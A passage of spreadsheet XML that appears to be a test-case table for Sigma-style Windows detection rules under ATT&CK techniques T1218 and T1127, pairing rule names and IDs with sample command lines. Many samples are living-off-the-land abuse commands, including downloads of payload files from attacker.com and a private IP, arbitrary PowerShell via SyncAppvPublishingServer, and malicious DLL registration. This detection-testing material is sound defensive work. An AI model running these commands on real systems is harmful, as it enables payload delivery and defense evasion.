        <is>
          <t>SyncAppvPublishingServer.exe "n;" Start-Process calc.exe</t>
        </is>
      </c>
      <c r="F2326" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2326" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2326" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2326" s="43" t="n"/>
      <c r="J2326" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2326" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2327" ht="15.75" customHeight="1" s="42">
      <c r="A2327" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2327" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh</t>
        </is>
      </c>
      <c r="C2327" s="43" t="inlineStr">
        <is>
          <t>SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code</t>
        </is>
      </c>
      <c r="D2327" s="43" t="inlineStr">
        <is>
          <t>36475a7d-0f6d-4dce-9b01-6aeb473bbaf1</t>
        </is>
      </c>
      <c r="E2327" s="43" t="inlineStr">
        <is>
          <t>copy SyncAppvPublishingServer.vbs Update.vbs &amp;&amp; cscript Update.vbs "\n;powershell.exe -NoP -Command Write-Host 'Bypassed'"</t>
        </is>
      </c>
      <c r="F2327" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2327" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2327" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2327" s="43" t="n"/>
      <c r="J2327" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2327" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2328" ht="15.75" customHeight="1" s="42">
      <c r="A2328" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2328" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolscript_register_app</t>
        </is>
      </c>
      <c r="C2328" s="43" t="inlineStr">
        <is>
          <t>Potential Register_App.Vbs LOLScript Abuse</t>
        </is>
      </c>
      <c r="D2328" s="43" t="inlineStr">
        <is>
          <t>28c8f68b-098d-45af-8d43-8089f3e35403</t>
        </is>
      </c>
      <c r="E2328" s="43" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\vss\vsssampleprovider\register_app.vbs %TEMP%\legit.txt &amp;&amp; cscript //e:vbscript %TEMP%\legit.txt -register "malicious.dll" "MaliciousProvider"</t>
        </is>
      </c>
      <c r="F2328" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2328" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2328" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2328" s="43" t="n"/>
      <c r="J2328" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2328" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2329" ht="15.75" customHeight="1" s="42">
      <c r="A2329" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2329" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolscript_register_app</t>
        </is>
      </c>
      <c r="C2329" s="43" t="inlineStr">
        <is>
          <t>Potential Register_App.Vbs LOLScript Abuse</t>
        </is>
      </c>
      <c r="D2329" s="43" t="inlineStr">
        <is>
          <t>28c8f68b-098d-45af-8d43-8089f3e35403</t>
        </is>
      </c>
      <c r="E2329" s="43" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\vss\vsssampleprovider\register_app.vbs %TEMP%\legit.txt &amp;&amp; cscript //e:vbscript %TEMP%\legit.txt -register malicious.dll MaliciousProvider</t>
        </is>
      </c>
      <c r="F2329" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2329" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2329" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2329" s="43" t="n"/>
      <c r="J2329" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2329" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2330" ht="15.75" customHeight="1" s="42">
      <c r="A2330" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2330" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_mofcomp_execution</t>
        </is>
      </c>
      <c r="C2330" s="43" t="inlineStr">
        <is>
          <t>Potential Suspicious Mofcomp Execution</t>
        </is>
      </c>
      <c r="D2330" s="43" t="inlineStr">
        <is>
          <t>1dd05363-104e-4b4a-b963-196a534b03a1</t>
        </is>
      </c>
      <c r="E2330" s="43" t="inlineStr">
        <is>
          <t>"C:\windows\system32\wbem\mofcomp.exe" C:\Windows\Temp\evasion.mof</t>
        </is>
      </c>
      <c r="F2330" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2330" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2330" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2330" s="43" t="n"/>
      <c r="J2330" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2330" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2331" ht="15.75" customHeight="1" s="42">
      <c r="A2331" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2331" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_remotefxvgpudisablement_abuse</t>
        </is>
      </c>
      <c r="C2331" s="43" t="inlineStr">
        <is>
          <t>RemoteFXvGPUDisablement Abuse Via AtomicTestHarnesses</t>
        </is>
      </c>
      <c r="D2331" s="43" t="inlineStr">
        <is>
          <t>a6fc3c46-23b8-4996-9ea2-573f4c4d88c5</t>
        </is>
      </c>
      <c r="E2331" s="43" t="inlineStr">
        <is>
          <t>"powershell.exe" &amp; { Invoke-ATHRemoteFXvGPUDisablementCommand -ModuleName foo -ModulePath $PWD }</t>
        </is>
      </c>
      <c r="F2331" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2331" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2331" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2331" s="43" t="n"/>
      <c r="J2331" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2331" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2332" ht="15.75" customHeight="1" s="42">
      <c r="A2332" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2332" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_presentationhost_download</t>
        </is>
      </c>
      <c r="C2332" s="43" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via PresentationHost.EXE</t>
        </is>
      </c>
      <c r="D2332" s="43" t="inlineStr">
        <is>
          <t>b124ddf4-778d-418e-907f-6dd3fc0d31cd</t>
        </is>
      </c>
      <c r="E2332" s="43" t="inlineStr">
        <is>
          <t>PresentationHost.exe - http://192.168.1.50/share/payload.xbap</t>
        </is>
      </c>
      <c r="F2332" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2332" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2332" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2332" s="43" t="n"/>
      <c r="J2332" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2332" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2333" ht="15.75" customHeight="1" s="42">
      <c r="A2333" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2333" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_presentationhost_download</t>
        </is>
      </c>
      <c r="C2333" s="43" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via PresentationHost.EXE</t>
        </is>
      </c>
      <c r="D2333" s="43" t="inlineStr">
        <is>
          <t>b124ddf4-778d-418e-907f-6dd3fc0d31cd</t>
        </is>
      </c>
      <c r="E2333" s="43" t="inlineStr">
        <is>
          <t>PresentationHost.exe https://192.168.1.50/share/payload.xbap</t>
        </is>
      </c>
      <c r="F2333" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2333" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2333" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2333" s="43" t="n"/>
      <c r="J2333" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2333" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2334" ht="15.75" customHeight="1" s="42">
      <c r="A2334" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2334" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_presentationhost_download</t>
        </is>
      </c>
      <c r="C2334" s="43" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via PresentationHost.EXE</t>
        </is>
      </c>
      <c r="D2334" s="43" t="inlineStr">
        <is>
          <t>b124ddf4-778d-418e-907f-6dd3fc0d31cd</t>
        </is>
      </c>
      <c r="E2334" s="43" t="inlineStr">
        <is>
          <t>PresentationHost.exe ftp://192.168.1.50/share/payload.xbap</t>
        </is>
      </c>
      <c r="F2334" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2334" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2334" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2334" s="43" t="n"/>
      <c r="J2334" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2334" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2335" ht="15.75" customHeight="1" s="42">
      <c r="A2335" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2335" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_presentationhost_download</t>
        </is>
      </c>
      <c r="C2335" s="43" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via PresentationHost.EXE</t>
        </is>
      </c>
      <c r="D2335" s="43" t="inlineStr">
        <is>
          <t>b124ddf4-778d-418e-907f-6dd3fc0d31cd</t>
        </is>
      </c>
      <c r="E2335" s="43" t="inlineStr">
        <is>
          <t>PresentationHost.exe \\192.168.1.50\share\payload.xbap</t>
        </is>
      </c>
      <c r="F2335" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2335" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2335" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2335" s="43" t="n"/>
      <c r="J2335" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2335" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2336" ht="15.75" customHeight="1" s="42">
      <c r="A2336" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2336" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_print_remote_file_copy</t>
        </is>
      </c>
      <c r="C2336" s="43" t="inlineStr">
        <is>
          <t>Abusing Print Executable</t>
        </is>
      </c>
      <c r="D2336" s="43" t="inlineStr">
        <is>
          <t>bafac3d6-7de9-4dd9-8874-4a1194b493ed</t>
        </is>
      </c>
      <c r="E2336" s="43" t="inlineStr">
        <is>
          <t>print /D:destination.exe source.exe</t>
        </is>
      </c>
      <c r="F2336" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2336" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2336" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2336" s="43" t="n"/>
      <c r="J2336" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2336" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2337" ht="15.75" customHeight="1" s="42">
      <c r="A2337" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2337" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_protocolhandler_download</t>
        </is>
      </c>
      <c r="C2337" s="43" t="inlineStr">
        <is>
          <t>File Download Using ProtocolHandler.exe</t>
        </is>
      </c>
      <c r="D2337" s="43" t="inlineStr">
        <is>
          <t>104cdb48-a7a8-4ca7-a453-32942c6e5dcb</t>
        </is>
      </c>
      <c r="E2337" s="43" t="inlineStr">
        <is>
          <t>ProtocolHandler.exe http://attacker.com/payload.exe</t>
        </is>
      </c>
      <c r="F2337" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2337" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2337" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2337" s="43" t="n"/>
      <c r="J2337" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2337" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2338" ht="15.75" customHeight="1" s="42">
      <c r="A2338" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2338" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_protocolhandler_download</t>
        </is>
      </c>
      <c r="C2338" s="43" t="inlineStr">
        <is>
          <t>File Download Using ProtocolHandler.exe</t>
        </is>
      </c>
      <c r="D2338" s="43" t="inlineStr">
        <is>
          <t>104cdb48-a7a8-4ca7-a453-32942c6e5dcb</t>
        </is>
      </c>
      <c r="E2338" s="43" t="inlineStr">
        <is>
          <t>set URL=http://attacker.com/payload.exe &amp;&amp; ProtocolHandler.exe %URL%</t>
        </is>
      </c>
      <c r="F2338" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2338" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2338" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2338" s="43" t="n"/>
      <c r="J2338" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2338" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2339" ht="15.75" customHeight="1" s="42">
      <c r="A2339" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2339" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_registry_provlaunch_provisioning_command</t>
        </is>
      </c>
      <c r="C2339" s="43" t="inlineStr">
        <is>
          <t>Potential Provisioning Registry Key Abuse For Binary Proxy Execution</t>
        </is>
      </c>
      <c r="D2339" s="43" t="inlineStr">
        <is>
          <t>2a4b3e61-9d22-4e4a-b60f-6e8f0cde6f25</t>
        </is>
      </c>
      <c r="E2339" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c reg.exe add HKLM\"SOFTWARE\Microsoft\Provisioning\Commands\LOLBin\dummy1" /v altitude /t REG_DWORD /d 0 &amp; reg add HKLM\"SOFTWARE\Microsoft\Provisioning\Commands\LOLBin\dummy1\dummy2" /v Commandline /d calc.exe &amp; c:\windows\system32\provlaunch.exe LOLBin</t>
        </is>
      </c>
      <c r="F2339" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2339" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2339" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2339" s="43" t="n"/>
      <c r="J2339" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2339" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2340" ht="15.75" customHeight="1" s="42">
      <c r="A2340" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2340" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_registry_provlaunch_provisioning_command</t>
        </is>
      </c>
      <c r="C2340" s="43" t="inlineStr">
        <is>
          <t>Potential Provisioning Registry Key Abuse For Binary Proxy Execution</t>
        </is>
      </c>
      <c r="D2340" s="43" t="inlineStr">
        <is>
          <t>2a4b3e61-9d22-4e4a-b60f-6e8f0cde6f25</t>
        </is>
      </c>
      <c r="E2340" s="43" t="inlineStr">
        <is>
          <t>reg.exe add HKLM\SOFTWARE\Microsoft\Provisioning\Commands\LOLBin\dummy1 /v altitude /t REG_DWORD /d 0</t>
        </is>
      </c>
      <c r="F2340" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2340" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2340" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2340" s="43" t="n"/>
      <c r="J2340" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2340" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2341" ht="15.75" customHeight="1" s="42">
      <c r="A2341" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2341" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_registry_provlaunch_provisioning_command</t>
        </is>
      </c>
      <c r="C2341" s="43" t="inlineStr">
        <is>
          <t>Potential Provisioning Registry Key Abuse For Binary Proxy Execution</t>
        </is>
      </c>
      <c r="D2341" s="43" t="inlineStr">
        <is>
          <t>2a4b3e61-9d22-4e4a-b60f-6e8f0cde6f25</t>
        </is>
      </c>
      <c r="E2341" s="43" t="inlineStr">
        <is>
          <t>provlaunch.exe "SOFTWARE\Microsoft\Provisioning\Commands"</t>
        </is>
      </c>
      <c r="F2341" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2341" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2341" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2341" s="43" t="n"/>
      <c r="J2341" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2341" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2342" ht="15.75" customHeight="1" s="42">
      <c r="A2342" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2342" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_registry_provlaunch_provisioning_command</t>
        </is>
      </c>
      <c r="C2342" s="43" t="inlineStr">
        <is>
          <t>Potential Provisioning Registry Key Abuse For Binary Proxy Execution</t>
        </is>
      </c>
      <c r="D2342" s="43" t="inlineStr">
        <is>
          <t>2a4b3e61-9d22-4e4a-b60f-6e8f0cde6f25</t>
        </is>
      </c>
      <c r="E2342" s="43" t="inlineStr">
        <is>
          <t>provlaunch.exe SOFTWARE/Microsoft/Provisioning/Commands</t>
        </is>
      </c>
      <c r="F2342" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2342" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2342" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2342" s="43" t="n"/>
      <c r="J2342" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2342" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2343" ht="15.75" customHeight="1" s="42">
      <c r="A2343" s="43" t="inlineStr">
        <is>
          <t>t1127</t>
        </is>
      </c>
      <c r="B2343" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_aspnet_compiler_susp_paths</t>
        </is>
      </c>
      <c r="C2343" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious ASP.NET Compilation Via AspNetCompiler</t>
        </is>
      </c>
      <c r="D2343" s="43" t="inlineStr">
        <is>
          <t>9f50fe98-fe5c-4a2d-86c7-fad7f63ed622 # Susp Paths</t>
        </is>
      </c>
      <c r="E2343" s="43" t="inlineStr">
        <is>
          <t>aspnet_compiler.exe -v / -p "C:\Users\Public\TestSite" "C:\AppData\Local\Temp\Output"</t>
        </is>
      </c>
      <c r="F2343" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2343" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2343" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2343" s="43" t="n"/>
      <c r="J2343" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2343" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2344" ht="15.75" customHeight="1" s="42">
      <c r="A2344" s="43" t="inlineStr">
        <is>
          <t>t1127</t>
        </is>
      </c>
      <c r="B2344" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_aspnet_compiler_susp_paths</t>
        </is>
      </c>
      <c r="C2344" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious ASP.NET Compilation Via AspNetCompiler</t>
        </is>
      </c>
      <c r="D2344" s="43" t="inlineStr">
        <is>
          <t>9f50fe98-fe5c-4a2d-86c7-fad7f63ed622 # Susp Paths</t>
        </is>
      </c>
      <c r="E2344" s="43" t="inlineStr">
        <is>
          <t>aspnet_compiler.exe -v / -p C:\Users\Public\TestSite C:\AppData\Local\Temp\Output</t>
        </is>
      </c>
      <c r="F2344" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2344" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2344" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2344" s="43" t="n"/>
      <c r="J2344" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2344" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2345" ht="15.75" customHeight="1" s="42">
      <c r="A2345" s="43" t="inlineStr">
        <is>
          <t>t1127</t>
        </is>
      </c>
      <c r="B2345" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_aspnet_compiler_susp_paths</t>
        </is>
      </c>
      <c r="C2345" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious ASP.NET Compilation Via AspNetCompiler</t>
        </is>
      </c>
      <c r="D2345" s="43" t="inlineStr">
        <is>
          <t>9f50fe98-fe5c-4a2d-86c7-fad7f63ed622 # Susp Paths</t>
        </is>
      </c>
      <c r="E2345" s="43" t="inlineStr">
        <is>
          <t>aspnet_compiler.exe -v / -p C:\Users\Public\TestSite C:\Windows\Temp\Output</t>
        </is>
      </c>
      <c r="F2345" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2345" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2345" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2345" s="43" t="n"/>
      <c r="J2345" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2345" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2346" ht="15.75" customHeight="1" s="42">
      <c r="A2346" s="43" t="inlineStr">
        <is>
          <t>t1127</t>
        </is>
      </c>
      <c r="B2346" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_aspnet_compiler_susp_paths</t>
        </is>
      </c>
      <c r="C2346" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious ASP.NET Compilation Via AspNetCompiler</t>
        </is>
      </c>
      <c r="D2346" s="43" t="inlineStr">
        <is>
          <t>9f50fe98-fe5c-4a2d-86c7-fad7f63ed622 # Susp Paths</t>
        </is>
      </c>
      <c r="E2346" s="43" t="inlineStr">
        <is>
          <t>aspnet_compiler.exe -v / -p C:\Users\Public\TestSite C:\Users\MyUser\AppData\Local\Temp\Output</t>
        </is>
      </c>
      <c r="F2346" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2346" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2346" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2346" s="43" t="n"/>
      <c r="J2346" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2346" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2347" ht="15.75" customHeight="1" s="42">
      <c r="A2347" s="43" t="inlineStr">
        <is>
          <t>t1127</t>
        </is>
      </c>
      <c r="B2347" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_aspnet_compiler_susp_paths</t>
        </is>
      </c>
      <c r="C2347" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious ASP.NET Compilation Via AspNetCompiler</t>
        </is>
      </c>
      <c r="D2347" s="43" t="inlineStr">
        <is>
          <t>9f50fe98-fe5c-4a2d-86c7-fad7f63ed622 # Susp Paths</t>
        </is>
      </c>
      <c r="E2347" s="43" t="inlineStr">
        <is>
          <t>aspnet_compiler.exe -v / -p C:\Users\Public\TestSite C:\Windows\System32\Tasks\Output</t>
        </is>
      </c>
      <c r="F2347" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2347" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2347" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2347" s="43" t="n"/>
      <c r="J2347" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2347" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2348" ht="15.75" customHeight="1" s="42">
      <c r="A2348" s="43" t="inlineStr">
        <is>
          <t>t1127</t>
        </is>
      </c>
      <c r="B2348" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_ilasm_il_code_compilation</t>
        </is>
      </c>
      <c r="C2348" s="43" t="inlineStr">
        <is>
          <t>C# IL Code Compilation Via Ilasm.EXE</t>
        </is>
      </c>
      <c r="D2348" s="43" t="inlineStr">
        <is>
          <t>850d55f9-6eeb-4492-ad69-a72338f65ba4</t>
        </is>
      </c>
      <c r="E2348" s="43" t="inlineStr">
        <is>
          <t>ilasm -dll -out=test.dll source.il</t>
        </is>
      </c>
      <c r="F2348" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2348" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2348" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2348" s="43" t="n"/>
      <c r="J2348" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2348" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2349" ht="15.75" customHeight="1" s="42">
      <c r="A2349" s="43" t="inlineStr">
        <is>
          <t>t1127</t>
        </is>
      </c>
      <c r="B2349" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_ilasm_il_code_compilation</t>
        </is>
      </c>
      <c r="C2349" s="43" t="inlineStr">
        <is>
          <t>C# IL Code Compilation Via Ilasm.EXE</t>
        </is>
      </c>
      <c r="D2349" s="43" t="inlineStr">
        <is>
          <t>850d55f9-6eeb-4492-ad69-a72338f65ba4</t>
        </is>
      </c>
      <c r="E2349" s="43" t="inlineStr">
        <is>
          <t>ilasm /dll source.il -out:test.dll</t>
        </is>
      </c>
      <c r="F2349" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2349" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2349" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2349" s="43" t="n"/>
      <c r="J2349" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2349" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2350" ht="15.75" customHeight="1" s="42">
      <c r="A2350" s="43" t="inlineStr">
        <is>
          <t>t1127</t>
        </is>
      </c>
      <c r="B2350" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_ilasm_il_code_compilation</t>
        </is>
      </c>
      <c r="C2350" s="43" t="inlineStr">
        <is>
          <t>C# IL Code Compilation Via Ilasm.EXE</t>
        </is>
      </c>
      <c r="D2350" s="43" t="inlineStr">
        <is>
          <t>850d55f9-6eeb-4492-ad69-a72338f65ba4</t>
        </is>
      </c>
      <c r="E2350" s="43" t="inlineStr">
        <is>
          <t>ilasm /dll source.il -out:./test.dll</t>
        </is>
      </c>
      <c r="F2350" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2350" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2350" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2350" s="43" t="n"/>
      <c r="J2350" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2350" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2351" ht="15.75" customHeight="1" s="42">
      <c r="A2351" s="43" t="inlineStr">
        <is>
          <t>t1127</t>
        </is>
      </c>
      <c r="B2351" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_kavremover_uncommon_execution</t>
        </is>
      </c>
      <c r="C2351" s="43" t="inlineStr">
        <is>
          <t>Kavremover Dropped Binary LOLBIN Usage</t>
        </is>
      </c>
      <c r="D2351" s="43" t="inlineStr">
        <is>
          <t>d047726b-c71c-4048-a99b-2e2f50dc107d</t>
        </is>
      </c>
      <c r="E2351" s="43" t="inlineStr">
        <is>
          <t>copy kavremover_dropped_binary.exe not_kav.exe &amp;&amp; not_kav.exe run run-cmd "whoami"</t>
        </is>
      </c>
      <c r="F2351" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2351" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2351" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2351" s="43" t="n"/>
      <c r="J2351" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2351" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2352" ht="15.75" customHeight="1" s="42">
      <c r="A2352" s="43" t="inlineStr">
        <is>
          <t>t1127</t>
        </is>
      </c>
      <c r="B2352" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_vsiisexelauncher</t>
        </is>
      </c>
      <c r="C2352" s="43" t="inlineStr">
        <is>
          <t>Use of VSIISExeLauncher.exe</t>
        </is>
      </c>
      <c r="D2352" s="43" t="inlineStr">
        <is>
          <t>18749301-f1c5-4efc-a4c3-276ff1f5b6f8</t>
        </is>
      </c>
      <c r="E2352" s="43" t="inlineStr">
        <is>
          <t>VSIISExeLauncher.exe -p calc.exe -a arguments</t>
        </is>
      </c>
      <c r="F2352" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2352" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2352" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2352" s="43" t="n"/>
      <c r="J2352" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2352" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2353" ht="15.75" customHeight="1" s="42">
      <c r="A2353" s="43" t="inlineStr">
        <is>
          <t>t1127</t>
        </is>
      </c>
      <c r="B2353" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_node_abuse</t>
        </is>
      </c>
      <c r="C2353" s="43" t="inlineStr">
        <is>
          <t>Potential Arbitrary Code Execution Via Node.EXE</t>
        </is>
      </c>
      <c r="D2353" s="43" t="inlineStr">
        <is>
